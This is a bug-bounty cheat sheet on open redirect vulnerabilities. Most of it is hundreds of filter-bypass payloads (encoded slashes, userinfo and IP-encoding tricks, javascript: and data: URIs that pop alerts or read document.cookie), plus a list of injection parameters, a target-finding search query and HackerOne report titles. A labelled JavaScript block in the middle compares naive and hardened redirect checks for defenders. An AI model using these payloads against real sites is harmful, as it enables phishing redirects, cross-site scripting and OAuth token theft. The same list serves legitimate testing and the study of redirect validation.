Open Redirect Cheat Sheet
Posted in Cheatsheets on November 2, 2018
Hi, this is a cheat sheet for Open redirect vulnerabilities.
It’s a first draft. I will update it every time I find a new payload, tip or writeup. So if you’re interested in open redirects, keep an eye on this page!
Payloads to detect open redirection:
<>//localdomain.pw
//;@localdomain.pw
/////localdomain.pw/
/////localdomain.pw
////localdomain.pw//
////localdomain.pw/
///\;@localdomain.pw
///localdomain.pw//
///localdomain.pw/
///localdomain.pw
//\/localdomain.pw/
//localdomain.pw//
//localdomain.pw/
//localdomain.pw
/.localdomain.pw
/\/localdomain.pw/
/〱localdomain.pw
.localdomain.pw
@localdomain.pw
\/\/localdomain.pw/
〱localdomain.pw
//localdomain%00.pw
%01https://localdomain.pw
%01https://google.com
////%09/localdomain.pw
///%09/localdomain.pw
//%09/localdomain.pw
/%09/localdomain.pw
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
/%09/javascript:alert(1);
/%09/javascript:alert(1)
////%09/whitelisted.com@localdomain.pw
///%09/whitelisted.com@localdomain.pw
//%09/whitelisted.com@localdomain.pw
/%09/whitelisted.com@localdomain.pw
////%09/whitelisted.com@google.com
///%09/whitelisted.com@google.com
//%09/whitelisted.com@google.com
/%09/whitelisted.com@google.com
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////localdomain.pw/%2e%2e
///localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
//localdomain.pw/%2e%2e%2f
////localdomain.pw/%2f..
///localdomain.pw/%2f..
//localdomain.pw/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
////localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
//localdomain.pw/%2f%2e%2e
/localdomain.pw/%2f%2e%2e
//%2f%2flocaldomain.pw
/%2f%2flocaldomain.pw
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//3H6k7lIAiqjfNeN@whitelisted.com@localdomain.pw/
//3H6k7lIAiqjfNeN@whitelisted.com+@localdomain.pw/
//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
////%5clocaldomain.pw
///%5clocaldomain.pw
//%5clocaldomain.pw
/%5clocaldomain.pw
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
////%5cwhitelisted.com@localdomain.pw
///%5cwhitelisted.com@localdomain.pw
//%5cwhitelisted.com@localdomain.pw
/%5cwhitelisted.com@localdomain.pw
////%5cwhitelisted.com@google.com
///%5cwhitelisted.com@google.com
//%5cwhitelisted.com@google.com
/%5cwhitelisted.com@google.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//localdomain.pw:80@whitelisted.com/
//localdomain.pw:80#@whitelisted.com/
";alert(0);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//localdomain%E3%80%82pw
//google%00.com
/\google%252ecom
google%252ecom
<>//google.com
/<>//google.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
/〱google.com
/google.com
../google.com
.google.com
@google.com
\/\/google.com/
〱google.com
google.com
google.com%[email protected]
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F..
/google.com/%2F..
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:80@whitelisted.com/
//google.com:80#@whitelisted.com/
google.com/.jpg
//google.com\twhitelisted.com/
//google.com/whitelisted.com
//google.com\@whitelisted.com
google.com/whitelisted.com
//google%E3%80%82com
/http://localdomain.pw
/http:/localdomain.pw
http://;@localdomain.pw
http://.localdomain.pw
http:/localdomain.pw
http:localdomain.pw
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dlocaldomain.pw
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://localdomain.pw%23.whitelisted.com/
http://localdomain.pw%2f%2f.whitelisted.com/
http://3627734734
http:3627734734
http://localdomain.pw%3F.whitelisted.com/
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@whitelisted.com@localdomain.pw/
http://3H6k7lIAiqjfNeN@whitelisted.com+@localdomain.pw/
http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
http://472.314.470.462
http:472.314.470.462
http://localdomain.pw%5c%5c.whitelisted.com/
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://localdomain.pw:80@whitelisted.com/
http://localdomain.pw:80#@whitelisted.com/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
/http://google.com
/http:/google.com
http://;@google.com
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.whitelisted.com/
http://google.com%2f%2f.whitelisted.com/
http://google.com%3F.whitelisted.com/
http://google.com%5c%5c.whitelisted.com/
http://google.com:80@whitelisted.com/
http://google.com:80#@whitelisted.com/
http://google.com\twhitelisted.com/
//https://localdomain.pw//
/https://localdomain.pw/
https://localdomain.pw//
https://localdomain.pw/
https://localdomain.pw
https:localdomain.pw
https://%09/localdomain.pw
/https://%09/google.com
https://%09/google.com
https://%09/whitelisted.com@localdomain.pw
https://%09/whitelisted.com@google.com
https://%0a%0dlocaldomain.pw
https://%0a%0dgoogle.com
//https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
//https://localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
/https://localdomain.pw/%2f..
https://localdomain.pw/%2f..
/https:///localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
https%3a%2f%2fgoogle.com%2f
/https://%5clocaldomain.pw
/https:/%5clocaldomain.pw/
https://%5clocaldomain.pw
https:/%5clocaldomain.pw/
/https://%5cgoogle.com
/https:/%5cgoogle.com/
https://%5cgoogle.com
https:/%5cgoogle.com/
/https://%5cwhitelisted.com@localdomain.pw
https://%5cwhitelisted.com@localdomain.pw
/https://%5cwhitelisted.com@google.com
https://%5cwhitelisted.com@google.com
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com//
/https://google.com/
/https://google.com
/https:google.com
https://////google.com
https://google.com//
https://google.com/
https://google.com
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@whitelisted.com
https://google.com?whitelisted.com
https://google.com/whitelisted.com
https://google.com\whitelisted.com
https://google.com#whitelisted.com
https://google%E3%80%82com
//https://whitelisted.com@localdomain.pw//
/https://whitelisted.com@localdomain.pw/
https://:@localdomain.pw\@whitelisted.com
https://localdomain.pw/whitelisted.com
https://whitelisted.com;@localdomain.pw
https://whitelisted.com@localdomain.pw//
https://whitelisted.com@localdomain.pw/
https://whitelisted.com@localdomain.pw
/https://whitelisted.com@localdomain.pw/%2e%2e
https:///whitelisted.com@localdomain.pw/%2e%2e
//https://whitelisted.com@localdomain.pw/%2e%2e%2f
https://whitelisted.com@localdomain.pw/%2e%2e%2f
/https://whitelisted.com@localdomain.pw/%2f..
https://whitelisted.com@localdomain.pw/%2f..
/https:///whitelisted.com@localdomain.pw/%2f%2e%2e
/https://whitelisted.com@localdomain.pw/%2f%2e%2e
https:///whitelisted.com@localdomain.pw/%2f%2e%2e
https://whitelisted.com@localdomain.pw/%2f%2e%2e
//https://whitelisted.com@google.com//
/https://whitelisted.com@google.com/
https://whitelisted.com;@google.com
https://whitelisted.com.google.com
https://whitelisted.com@google.com//
https://whitelisted.com@google.com/
https://whitelisted.com@google.com
/https://whitelisted.com@google.com/%2e%2e
https:///whitelisted.com@google.com/%2e%2e
//https://whitelisted.com@google.com/%2e%2e%2f
https://whitelisted.com@google.com/%2e%2e%2f
/https://whitelisted.com@google.com/%2f..
https://whitelisted.com@google.com/%2f..
/https:///whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@google.com/%2f%2e%2e
https:///whitelisted.com@google.com/%2f%2e%2e
https://whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
https://whitelisted.com/https://localdomain.pw/
https://whitelisted.com/https://google.com/
@https://www.google.com
http://localdomain.pw\twhitelisted.com/
http://whitelisted.com@00330.00072.0000326.00000316
http:whitelisted.com@00330.00072.0000326.00000316
http://whitelisted.com@00330.0x3a.54990
http:whitelisted.com@00330.0x3a.54990
http://whitelisted.com@00330.3856078
http:whitelisted.com@00330.3856078
http://whitelisted.com@0330.072.0326.0316
http:whitelisted.com@0330.072.0326.0316
http://whitelisted.com@0xd8.072.54990
http:whitelisted.com@0xd8.072.54990
http://whitelisted.com@0xd8.0x3a.0xd6.0xce
http:whitelisted.com@0xd8.0x3a.0xd6.0xce
http://whitelisted.com@0xd8.3856078
http:whitelisted.com@0xd8.3856078
http://whitelisted.com@0xd83ad6ce
http:whitelisted.com@0xd83ad6ce
http://whitelisted.com@[::216.58.214.206]
http:whitelisted.com@[::216.58.214.206]
http://whitelisted.com%2elocaldomain.pw/
http://whitelisted.com%2egoogle.com/
http://whitelisted.com@3627734734
http:whitelisted.com@3627734734
http://whitelisted.com@472.314.470.462
http:whitelisted.com@472.314.470.462
http://whitelisted.com:80%40localdomain.pw/
http://whitelisted.com:80%40google.com/
http://whitelisted.com@[::ffff:216.58.214.206]
http:whitelisted.com@[::ffff:216.58.214.206]
http://whitelisted.com@google.com/
http://whitelisted.com+&@google.com#+@whitelisted.com/
http://whitelisted.com+&@localdomain.pw#+@whitelisted.com/
http://www.google.com\.whitelisted.com
http://www.localdomain.pw\.whitelisted.com
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@whitelisted.com@localdomain.pw/
http://XY>.7d8T\205pZM@whitelisted.com+@localdomain.pw/
http://XY>.7d8T\205pZM@whitelisted.com@google.com/
http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
//localdomain.pw\twhitelisted.com/
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
////whitelisted.com@localdomain.pw//
////whitelisted.com@localdomain.pw/
///whitelisted.com@localdomain.pw//
///whitelisted.com@localdomain.pw/
//localdomain.pw/whitelisted.com
//localdomain.pw\@whitelisted.com
//whitelisted.com@localdomain.pw//
//whitelisted.com@localdomain.pw/
localdomain.pw/whitelisted.com
whitelisted.com;@localdomain.pw
////whitelisted.com@localdomain.pw/%2e%2e
///whitelisted.com@localdomain.pw/%2e%2e
////whitelisted.com@localdomain.pw/%2e%2e%2f
///whitelisted.com@localdomain.pw/%2e%2e%2f
//whitelisted.com@localdomain.pw/%2e%2e%2f
////whitelisted.com@localdomain.pw/%2f..
///whitelisted.com@localdomain.pw/%2f..
//whitelisted.com@localdomain.pw/%2f..
////whitelisted.com@localdomain.pw/%2f%2e%2e
///whitelisted.com@localdomain.pw/%2f%2e%2e
//whitelisted.com@localdomain.pw/%2f%2e%2e
/\whitelisted.com:80%40google.com
whitelisted.com@%E2%80%[email protected]
////whitelisted.com@google.com//
////whitelisted.com@google.com/
///whitelisted.com@google.com//
///whitelisted.com@google.com/
//whitelisted.com@google.com//
//whitelisted.com@google.com/
whitelisted.com;@google.com
whitelisted.com.google.com
////whitelisted.com@google.com/%2e%2e
///whitelisted.com@google.com/%2e%2e
////whitelisted.com@google.com/%2e%2e%2f
///whitelisted.com@google.com/%2e%2e%2f
//whitelisted.com@google.com/%2e%2e%2f
////whitelisted.com@google.com/%2f..
///whitelisted.com@google.com/%2f..
//whitelisted.com@google.com/%2f..
////whitelisted.com@google.com/%2f%2e%2e
///whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com+&@google.com#+@whitelisted.com/
//whitelisted.com@https:///localdomain.pw/%2e%2e
//whitelisted.com@https:///google.com/%2e%2e
//whitelisted.com+&@localdomain.pw#+@whitelisted.com/
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\205pZM@whitelisted.com@localdomain.pw/
//XY>.7d8T\205pZM@whitelisted.com+@localdomain.pw/
//XY>.7d8T\205pZM@whitelisted.com@google.com/
//XY>.7d8T\205pZM@whitelisted.com+@google.com/
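Almost every payload above exploits the gap between what a server-side check sees and what the browser's URL parser does with the same string (backslashes become slashes, tabs vanish, userinfo hides the real host, a trusted name becomes a subdomain label). The block below is an added example, not code from the original cheat sheet: it runs a constructed sample of those payload families through the WHATWG URL parser (the parser browsers implement; Node exposes it as the global `URL`) against the cheat sheet's placeholder trusted host `whitelisted.com`, and puts a naive allow-check next to a hardened one. The function names and the sample list are this example's own.

```javascript
// Added example (not part of the original cheat sheet): resolve open-redirect
// payloads the way a browser would, and compare a naive check with a hardened one.
// `whitelisted.com` is the cheat sheet's placeholder for the trusted host.

const TRUSTED_ORIGIN = "https://whitelisted.com";

// Where would the browser actually go if this string came back in a Location
// header (or were assigned to location.href) on the trusted site?
function resolvedHost(target) {
  try {
    return new URL(target, TRUSTED_ORIGIN + "/").host;
  } catch {
    return null; // unparsable: the browser would not navigate at all
  }
}

// A typical broken check: "relative paths stay on our site, and absolute URLs
// are fine as long as they start with our origin".
function naiveIsSafe(target) {
  return target.startsWith("/") || target.startsWith(TRUSTED_ORIGIN);
}

// Hardened check: decode once (frameworks often decode before redirecting),
// refuse characters the browser silently strips or rewrites, then let the URL
// parser resolve the rest against the trusted origin and compare origins.
function hardenedIsSafe(target) {
  let decoded;
  try {
    decoded = decodeURIComponent(target);
  } catch {
    return false; // malformed percent-encoding
  }
  // C0 controls (tab/newline are dropped by the parser, NUL truncates in many
  // stacks) and backslash (a slash to the browser) are never legitimate here.
  if (/[\u0000-\u001f\u007f\\]/.test(decoded)) return false;
  let url;
  try {
    url = new URL(decoded, TRUSTED_ORIGIN + "/");
  } catch {
    return false;
  }
  if (url.username !== "" || url.password !== "") return false; // user@host tricks
  // javascript:/data: have origin "null"; http://whitelisted.com is a different origin.
  return url.origin === TRUSTED_ORIGIN;
}

// Constructed sample: a few payload families from the list above plus two
// legitimate targets.
const SAMPLE_PAYLOADS = [
  "/account",                            // legitimate same-site path
  "//google.com",                        // protocol-relative
  "///google.com",                       // the browser collapses the extra slash
  "/\\google.com",                       // backslash is a slash to the browser
  "/%09/google.com",                     // encoded tab: inert until the server decodes it...
  "/\t/google.com",                      // ...then the parser strips it and sees //google.com
  "/%2f%2fgoogle.com",                   // encoded slashes, same idea
  "https://whitelisted.com@google.com",  // trusted name in the userinfo
  "https://whitelisted.com.google.com",  // trusted name as a subdomain label
  "https://whitelisted.com.uk",          // a TLD appended to the trusted name
  "https://whitelisted.com/login",       // legitimate absolute URL
  "javascript:alert(1)",                 // scheme smuggling
  "https://google%E3%80%82com",          // U+3002 is mapped to "." by IDNA
];

// Payloads the naive check lets through that the hardened check stops.
function bypasses(payloads) {
  return payloads.filter((p) => naiveIsSafe(p) && !hardenedIsSafe(p));
}

for (const p of SAMPLE_PAYLOADS) {
  console.log(
    JSON.stringify(p).padEnd(40),
    String(resolvedHost(p)).padEnd(28),
    naiveIsSafe(p) ? "naive: allow " : "naive: block ",
    hardenedIsSafe(p) ? "hardened: allow" : "hardened: block",
  );
}
```

Run it with `node`; each row shows the host the browser would land on and whether each check lets the payload through. Note that `/%09/google.com` is harmless to the browser on its own and only turns into `//google.com` once the server percent-decodes it, which is why the hardened check decodes first and then refuses control characters and backslashes outright instead of trying to model every normalisation the parser performs.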
Common injection points (replace {payload} with one of the payloads above):
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
inurl:redirectUrl=http site:target.com
/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}
/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}
?next=whitelisted.com&next=google.com
?image_url={payload}/.jpg
target.com/?redirect_url=.uk (or [any_param]=.uk). If it redirects to target.com.uk, then it's vulnerable: target.com.uk and target.com are different domains.
https://whitelisted.com@%E2%80%[email protected]
Look for "Open redirect" (with Ctrl+F) in our [List of bug bounty writeups](/list-of-bug-bounty-writeups.html)
[CVE-2017-5871] Odoo: URL redirection to distrusted site (open redirect)
Hackerone report 158434: Open Redirect & XSS on Shopify, $1,000
Hackerone report 101962: Open Redirect on Shopify, $500
Hackerone report 55546: Open Redirect on Shopify, $500
Hackerone report 55525: Open Redirect on Shopify, $500
Hackerone report 169759: Open Redirect on Shopify, $500
Hackerone report 160047: Open Redirect on Shopify, $500
Hackerone report 103772: Open Redirect on Shopify, $500
Hackerone report 159522: Open Redirect on Shopify, $500
Hackerone report 226408: Open Redirect on Shopify
Hackerone report 405697: Open Redirect on Shopify
Hackerone report 153652: Open Redirect on Shopify
Hackerone report 175168: Open Redirect on Shopify
Hackerone report 188266: Open Redirect on Shopify
Hackerone report 56662: Open redirect & XSS on Shopify
Hackerone report 165046: Open Redirect on Shopify
Hackerone report 196846: Open Redirect & XSS on Starbucks, $375
Hackerone report 158034: Open redirect & XSS via SVG on Trello
Hackerone report 45513: Open redirect on Trello, $64
Hackerone report 292825: Open redirect on Ed / Github
Hackerone report 44425: Open redirect on Facebook
Hackerone report 165136: Open redirect on Mapbox
Hackerone report 114529: Open redirect & Content spoofing on Mapbox, $200
Hackerone report 143240: Open redirect & XSS on Mapbox
Hackerone report 177624: Open redirect, XSS & CRLF on Badoo
Hackerone report 99435: Open redirect & OAuth token theft on Badoo, $153
Hackerone report 108113: Open redirect on Twitter
Hackerone report 50752: Open redirect on Twitter
Hackerone report 283460: Open redirect on Twitter, $280
Hackerone report 246897: Open redirect on Twitter, $420
Hackerone report 260744: Open redirect & XSS on Twitter, $1,120
Hackerone report 49759: Open redirect & OAuth token theft on Twitter, $1,400
Hackerone report 39631: Open redirect on Twitter, $280
Hackerone report 131202: Open redirect & OAuth token theft on Twitter
Hackerone report 6017: Open redirect & OAuth token theft on Slack
Hackerone report 4549: Open redirect on Slack
Hackerone report 2622: Open redirect on Slack
Hackerone report 6035: Open redirect on Slack
Hackerone report 2731: Open redirect on Slack
Hackerone report 104087: Open redirect on Slack, $1,000
Hackerone report 16718: Open redirect on Slack, $100
Hackerone report 243474: Open redirect on Inflection, $750
Hackerone report 189726: Open redirect on HackerOne
Hackerone report 124620: Open redirect on HackerOne
Hackerone report 296706: Open redirect on HackerOne
Hackerone report 171398: Open redirect, CSRF & Self XSS on HackerOne
Hackerone report 23386: Open redirect on HackerOne, $500
Hackerone report 111968: Open redirect on HackerOne, $500
Hackerone report 178345: Open redirect on HackerOne
Hackerone report 27987: Open redirect on HackerOne, $500
Hackerone report 28865: Open redirect on HackerOne
Hackerone report 320376: Open redirect on HackerOne, $250
Hackerone report 299403: Open redirect on HackerOne, $500
Hackerone report 57163: Open redirect on HackerOne, $500
Hackerone report 119236: Open redirect on Uber
Hackerone report 125000: Open redirect on Uber, $500
Hackerone report 125791: Open redirect on Uber, $3,000
Hackerone report 126203: Open redirect & Cryptographic weakness on Uber, $500
Hackerone report 22142: Open redirect on Automattic
Hackerone report 129091: Open redirect on Automattic, $75
Hackerone report 191387: Open redirect & XSS on LocalTapiola
Hackerone report 179328: Open redirect on LocalTapiola, $400
Hackerone report 87027: Open redirect on Keybase, $500
Hackerone report 309058: Open redirect on Wordpress, $50
Hackerone report 277502: Open redirect on Wordpress, $275
Hackerone report 387007: Open redirect on TTS Bug Bounty, $150
Hackerone report 411723: Open redirect on Chaturbate, $200
Hackerone report 413426: Open redirect on Chaturbate, $250
Hackerone report 400982: Open redirect on Chaturbate, $250
Hackerone report 203726: Open redirect on Greenhouse.io, $100
Hackerone report 261592: Open redirect on Whisper, $30
Hackerone report 355758: Open redirect on PullString, $200
Hackerone report 288219: Open redirect on Moneybird, $50
Hackerone report 38157: Open redirect on QIWI, $150
Hackerone report 113112: Open redirect on Paragon Initiative Enterprises, $50
Hackerone report 179568: Open redirect on Open-Xchange, $666
Hackerone report 76738: Open redirect on Zaption, $25
Hackerone report 45516: Open redirect on Zaption
Hackerone report 178278: Open redirect & XSS on Informatica
Hackerone report 123625: Open redirect & XSS on Informatica
Hackerone report 14699: Open redirect on WePay
Hackerone report 20661: Open redirect on WePay
Hackerone report 3596: OAuth token theft via Open redirect on Phabricator
Hackerone report 25160: OAuth token theft via Open redirect on Phabricator
Hackerone report 6564: Open redirect on Khan Academy
Hackerone report 6357: Open redirect on Khan Academy
Hackerone report 145306: Open redirect on Veris
Hackerone report 44157: Open redirect on Vimeo
Hackerone report 11209: Open redirect on Meteor
Hackerone report 131082: Open redirect on ownCloud
Hackerone report 143265: Open redirect on Zomato
Hackerone report 91332: Open redirect on Imgur
Hackerone report 151831: Open redirect on Gratipay
Hackerone report 128910: Open redirect on Gratipay
Hackerone report 48065: Open redirect & OAuth token theft on Coinbase
Hackerone report 127741: Open redirect on New Relic
Hackerone report 132251: Open redirect & XSS on New Relic
Hackerone report 116315: Open redirect on New Relic
Hackerone report 144525: Open redirect on New Relic
Hackerone report 131552: Open redirect on New Relic
Hackerone report 177485: Open redirect on New Relic
Hackerone report 207505: Open redirect on New Relic
Hackerone report 207285: Open redirect on New Relic
Hackerone report 157813: Open redirect & XSS on OLX
Hackerone report 167107: Open redirect & XSS on OLX
Hackerone report 7900: Open redirect & OAuth token theft on Respondly
Hackerone report 244958: Open redirect & OAuth token theft on WakaTime
Hackerone report 405100: Open redirect & OAuth token theft on BOHEMIA INTERACTIVE a.s.
Hackerone report 236599: Open redirect on ExpressionEngine
Hackerone report 316319: Open redirect & XSS on SEMrush
Hackerone report 360797: Open redirect & XSS on Liberapay
Hackerone report 266688: Open redirect & XSS on Razer US
Hackerone report 270028: Open redirect & XSS on Razer US
Hackerone report 266355: Open redirect on Razer US
Hackerone report 220737: Open redirect on Mavenlink
Hackerone report 77221: Open redirect on Mavenlink
Hackerone report 25334: Open redirect on Square
Hackerone report 12949: Open redirect on Urban Dictionary
Hackerone report 12964: Open redirect on Urban Dictionary
Hackerone report 268245: Open redirect & XSS on Mail.Ru
Hackerone report 192373: Open redirect on Mail.Ru
Hackerone report 87804: Open redirect on Mail.Ru
Hackerone report 244721: Open redirect on Mail.Ru
Hackerone report 210384: Open redirect on Mail.Ru
Hackerone report 37593: Open redirect on Sucuri
Hackerone report 2989: Open redirect on OkCupid
Hackerone report 359453: Open redirect on Passit
Hackerone report 163124: Open redirect on Skyliner
Hackerone report 291750: Open redirect on Valve
Hackerone report 193027: Open redirect on Cloudflare
Hackerone report 215970: Open redirect on GitLab
Hackerone report 214034: Open redirect on GitLab
Hackerone report 39198: Open redirect on C2FO
Hackerone report 50379: Open redirect & XSS on Adobe
Hackerone report 238117: Open redirect on Weblate
Hackerone report 224317: Open redirect on Weblate
Hackerone report 223718: Open redirect on Weblate
Hackerone report 223326: Open redirect on Weblate
Hackerone report 243062: Open redirect on Arxius
Hackerone report 207431: Open redirect on Yelp
Hackerone report 211213: Open redirect on Nextcloud
Hackerone report 2414: Open redirect on RelateIQ
Hackerone report 172746: Open redirect on WebSummit
Hackerone report 239503: Open redirect & authentication token disclosure on Maximum, $350
Let me know if you have any comments, requests, questions… Feedback is always welcome.
See you next time!